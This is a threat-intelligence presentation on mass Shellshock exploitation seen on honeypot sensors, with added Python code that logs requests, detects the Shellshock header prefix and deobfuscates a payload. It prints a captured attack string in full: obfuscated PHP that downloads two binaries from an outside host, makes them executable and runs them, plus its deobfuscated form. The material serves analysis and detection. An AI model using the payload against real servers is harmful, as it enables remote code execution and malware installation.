Global attack patterns to improve threat detection

Curt Barnard, Software Implementation Engineer

Key Takeaways

• Evolution of methods used in mass exploitation
• Adoption of these methods by malicious actors
• Adaptation of these actors to defensive measures

Crawlers, bots, and automated exploitation scripts crowd the internet

Up to 80% of all site traffic is generated by bots [1]

Vulnerabilities in common, core programming libraries make juicy targets for malicious actors

[1] https://www.incapsula.com/blog/bot-traffic-report-2014.html

The internet is noisy

• Many malicious actors employ a “spray and pray” methodology
• Recent examples: Heartbleed, Shellshock, weak SSH credentials
• Commoditization of access is prevalent with non-targeted attacks

How do you get warnings of attacks?

Endgame employs a SensorNet of dummy web services to collect at-scale attack data:
– Multiple VPS providers
– Multiple geographic regions
– Multiple OS configurations
– Centralized logging

When hackers talk, we listen

Shellshock Attack

We have observed a bad actor executing:
– obfuscated PHP code
– by leveraging a Shellshock vulnerability
– via multiple client IP addresses

• Bash vulnerability related to variable assignment
• Can stuff it in HTTP headers

() { :;} ; <commands>

Shellshock prefix: () { :;} ;   Command sequence: <commands>

How is Shellshock formatted?

() { :;} ;echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";''$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";''$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";''$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");''$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");''$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
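The two pieces the SensorNet slide and the Shellshock slide describe, written out as an added Python example (this is not Endgame's SensorNet code or any tooling from the talk): a dummy web service that answers every request with 200 and writes one JSON line per request to a central log, keeping every header because a CGI front end may export any of them into the environment, and a scan over such records that flags the `() { ... } ;` prefix in any header value and groups hits by the command tail that follows it, so one payload arriving from several client addresses stands out. The sample records, hostnames and client addresses (RFC 5737 documentation ranges) are constructed; the `php -r 'system("uptime");'` tail is a shortened stand-in for the payload printed above, and the function and class names are chosen here.

```python
import json
import re
from http.server import BaseHTTPRequestHandler, HTTPServer

# Shellshock prefix: a bash exported-function definition "() { ... }" followed by a
# command sequence after the closing brace. Whitespace varies between payloads, so
# the check tolerates it and captures whatever follows the prefix.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)", re.DOTALL)


def make_record(client_ip, method, path, headers):
    """One JSON line for the central log. Every header is kept, because a CGI
    front end may export any of them as an environment variable."""
    return json.dumps({"client_ip": client_ip, "method": method, "path": path,
                       "headers": dict(headers)})


class DummyServiceHandler(BaseHTTPRequestHandler):
    """Dummy web service: answers 200 to anything and records the request."""
    log_sink = []  # in-memory here; a deployment would forward to the central log

    def _record(self):
        self.log_sink.append(make_record(self.client_address[0], self.command,
                                         self.path, self.headers.items()))
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(b"ok\n")

    do_GET = do_POST = _record

    def log_message(self, *_args):  # keep stdout quiet; the JSON lines are the log
        pass


def serve(port=8080):
    """Run the dummy service in the foreground (binds all interfaces)."""
    HTTPServer(("0.0.0.0", port), DummyServiceHandler).serve_forever()


def find_shellshock(headers):
    """Return (header_name, command_tail) for each header value carrying the prefix."""
    hits = []
    for name, value in headers.items():
        match = SHELLSHOCK_RE.search(value)
        if match:
            hits.append((name, match.group("cmd").strip()))
    return hits


def scan_log(lines):
    """Run the check over JSON-lines records; one alert per offending header."""
    alerts = []
    for line in lines:
        record = json.loads(line)
        for header, cmd in find_shellshock(record["headers"]):
            alerts.append({"client_ip": record["client_ip"], "path": record["path"],
                           "header": header, "command": cmd})
    return alerts


def group_by_command(alerts):
    """Map each distinct command tail to the sorted client IPs that sent it: one
    payload arriving from several addresses is the shared-infrastructure pattern."""
    groups = {}
    for alert in alerts:
        groups.setdefault(alert["command"], set()).add(alert["client_ip"])
    return {cmd: sorted(ips) for cmd, ips in groups.items()}


# Constructed sample traffic (not sensor data); addresses are RFC 5737 documentation ranges.
PHP_TAIL = "() { :;} ;echo;/usr/local/bin/php -r 'system(\"uptime\");'"
SAMPLE_LOG = [
    make_record("203.0.113.5", "GET", "/", {"Host": "sensor-01.example", "User-Agent": "Mozilla/5.0"}),
    make_record("198.51.100.7", "GET", "/cgi-bin/status",
                {"Host": "sensor-01.example", "User-Agent": "() { :;}; echo; /usr/bin/uptime"}),
    make_record("198.51.100.9", "GET", "/cgi-bin/status",
                {"Host": "sensor-02.example", "User-Agent": "curl/7.38.0", "Referer": PHP_TAIL}),
    make_record("192.0.2.33", "GET", "/cgi-bin/status",
                {"Host": "sensor-03.example", "User-Agent": PHP_TAIL}),
    make_record("203.0.113.8", "GET", "/login", {"Host": "sensor-01.example", "Cookie": "theme={dark}"}),
]

if __name__ == "__main__":
    for cmd, ips in group_by_command(scan_log(SAMPLE_LOG)).items():
        print(f"{len(ips)} source(s) {ips} -> {cmd}")
    # serve() would start the dummy service; run it on a disposable host only.
```

Run stand-alone, the script reports one source for the `uptime` tail and two sources (198.51.100.9 and 192.0.2.33) for the identical `php -r` tail; the `Cookie: theme={dark}` record shows that braces alone do not trigger the check, only the `()` function prefix does.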

Obfuscated PHP code

The code is obscured to confuse pattern matchers, but this is not very effective against humans.

system("uptime");
file_put_contents("AS1", fopen("http://x5d.su/x/AS1", 'r'));
file_put_contents("AS2", fopen("http://x5d.su/x/AS2", 'r'));
system("chmod 777 AS1");
system("chmod 777 AS2");
system("AS1");
system("AS2");

Deobfuscated PHP code

This is the definition of spray and pray, where the bad actor hopes to get something with a shotgun approach.
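The substitution that turns the obfuscated listing into the deobfuscated one, as an added Python example rather than code from the talk: it takes the command tail exactly as printed on the slide, extracts the program handed to `php -r` (undoing the shell's `'...''...'` concatenation), collects every `$x = "literal";` assignment and inlines the literal wherever the variable is used, including call-by-variable forms such as `$h("$k")`. Unlike the hand-written version above it keeps the one non-literal assignment, `$c = sys_get_temp_dir();`, symbolic instead of dropping the path prefix, and it executes nothing; the regular expressions and names are chosen here and cover this assignment style only, not arbitrary PHP.

```python
import re

# The command tail from the observed Shellshock request on the slide. The PHP is
# handed to `php -r` as a run of adjacent single-quoted shell strings ('...''...'),
# which the shell concatenates into one program. Lines are broken only at those
# joints, so stripping the line breaks restores the original one-liner.
OBSERVED_TAIL = "".join(line.strip() for line in r"""
echo;/usr/local/bin/php -r '$a = "http://x5d.su/x/AS1";''$b = "http://x5d.su/x/AS2";'
'$c = sys_get_temp_dir();''$d = "AS1";''$e = "AS2";''$f = "chmod 777";'
'$g = "file_put_contents";''$h = "system";''$i = "file_exists";''$j = "fopen";'
'$k = "uptime";''if ($i($c . "/$d"))''{''exit(1);''}else{''$h("$k");'
'$g("$c/$d", $j("$a", "r"));''$g("$c/$e", $j("$b", "r"));''$h("$f " . $c ."/$d");'
'$h("$f " . $c ."/$e");''$h($c . "/$d");''$h($c . "/$e");''}'
""".splitlines())

PHP_R_RE = re.compile(r"php -r '(?P<src>.*)'$", re.DOTALL)
STRING_ASSIGN_RE = re.compile(r'\$(?P<name>\w+)\s*=\s*"(?P<value>[^"]*)";')


def php_from_tail(tail):
    """Pull the PHP source out of the `php -r '...'` argument and undo the shell quoting."""
    match = PHP_R_RE.search(tail)
    if not match:
        raise ValueError("no php -r payload in command tail")
    return match.group("src").replace("''", "")


def deobfuscate(php):
    """Inline every `$x = "literal";` assignment at its uses and return the cleaned
    program plus the table of resolved literals (URLs fetched, functions called).
    Non-literal assignments such as `$c = sys_get_temp_dir();` stay symbolic."""
    literals = {}

    def collect(match):
        literals[match.group("name")] = match.group("value")
        return ""  # the assignment disappears; its value is inlined below

    body = STRING_ASSIGN_RE.sub(collect, php)
    for name, value in literals.items():
        # `$h(...)` becomes `system(...)`, `"$k"` becomes `"uptime"`, and so on.
        body = re.sub(r"\$" + re.escape(name) + r"\b", lambda _m, v=value: v, body)
    return body.strip(), literals


if __name__ == "__main__":
    clean, table = deobfuscate(php_from_tail(OBSERVED_TAIL))
    print("resolved literals:", table)
    print(clean.replace(";", ";\n"))
```

The resolved-literal table alone already answers the analyst's first questions (which URLs are fetched, which functions are reached through variables), and the cleaned program reads as the listing above with the `$c` temp-directory prefix and the `file_exists` guard still visible.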

The shocking summary

• Attackers are indiscriminately targeting web services with Shellshock
• They are using advanced techniques to prevent automated detection of TTPs
• The sophistication of these attacks has increased over time
• Several (likely compromised) sources are using the same infrastructure

Key Takeaways

• Evolution of methods used in mass exploitation
• Adoption of these methods by malicious actors
• Adaptation of these actors to defensive measures

For more information contact: [email protected]